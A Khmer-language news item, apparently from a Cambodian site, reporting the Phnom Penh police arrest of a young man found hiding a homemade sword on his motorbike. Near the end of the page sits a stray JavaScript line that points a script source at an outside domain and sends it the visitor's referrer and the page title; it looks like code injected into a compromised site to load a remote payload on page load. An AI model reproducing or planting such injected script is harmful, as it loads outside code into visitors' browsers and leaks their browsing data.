ព្រឹតិ្តការណ៍ថ្មីៗ

លាក់ដាវឆ្នៃជាប់ម៉ូតូ ត្រូវសមត្ថកិច្ចឃាត់ខ្លួន

2 ឆ្នាំ មុន 0 តូ សុផល

ភ្នំពេញ៖ យុវជនម្នាក់ត្រូវបានកម្លាំងអត្តរាគមន៍ខណ្ឌសែនសុខចាបមឃាត់ខ្លួនក្រោយពីឃាត់ត្រួតពិនិត្យឃើញមានលាក់ដាវឆ្នៃជាប់ម៉ូតូ។កាលពីម៉ោង០៨និង៣០នាទីព្រឹថ្ងៃទី៣១មករា២០១៧នៅ
ស្តុបផ្សារដីហុយផ្លូវ១០១៩ភូមិរោងចក្រសង្កាត់ភ្នំពេញថ្មីខណ្ឌសែនសុខ។

ជនសង្ស័យឈ្មោះលឿង ចន្ថា អាយុ២៣ឆ្នាំមុខរបរមិនពិតប្រាកដស្នាក់នៅផ្ទះជួលផ្លូវរ៉ារថភ្លើងសង្កាត់ស្រះចកខណ្ឌដូនពេញនិងមានស្រុកកំណើតភូមិចៀស១ឃុំថ្មពេជ្រស្រុកត្បូងឃ្មុំខេត្តកំពងមចាម។
សមត្ថកិច្ចបានប្រាប់ថាមុនឃាត់ខ្លួនជនសង្ស័យខាងលើខណះដែលកម្លាំងអត្តរាគមន៍ខណ្ឌសែនសុខជិះម៉ូតូល្បាតដលមចំណុចខាងលើបានឃើញជនសង្ស័យជិះម៉ូតូឌ្រឹនសង់សេ១១០
ពណ៌ខ្មៅសេរូ២០១២ពាក់ស្លាកលេខបាត់ដំបង1D-3822
ដោយសង្ស័យក៍ហៅឈប់ធ្វើការត្រួតពិនិត្យស្រាប់តែប្រទេះឃើញលាក់ទុកដាវឆ្នៃមួយដើមជាប់និងទូកម៉ូតូក៍ឃាត់ខ្លួនតែម្តង។
នៅចំពោះមុខសមត្ថកិច្ចជនសង្ស័យបានប្រាប់ថាដាវនេះពិតជារបស់ខ្លួនមែនដោយខ្លួនរក្សាទុកការពារខ្លួនប៉ុនណ្ណោះ។
បច្ចុប្បន្នជនសង្ស័យខាងលើត្រូវបានឃាត់ខ្លួនបណ្តោះអាសន្ននៅអធិការដ្ឋានបគរបាលខណ្ឌសែនសុខ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

បន្ថែមយោបល់របស់អ្នក

យោបល់

 

 

ព័ត៌មានពាក់ព័ន្ធ

error: Content is protected !!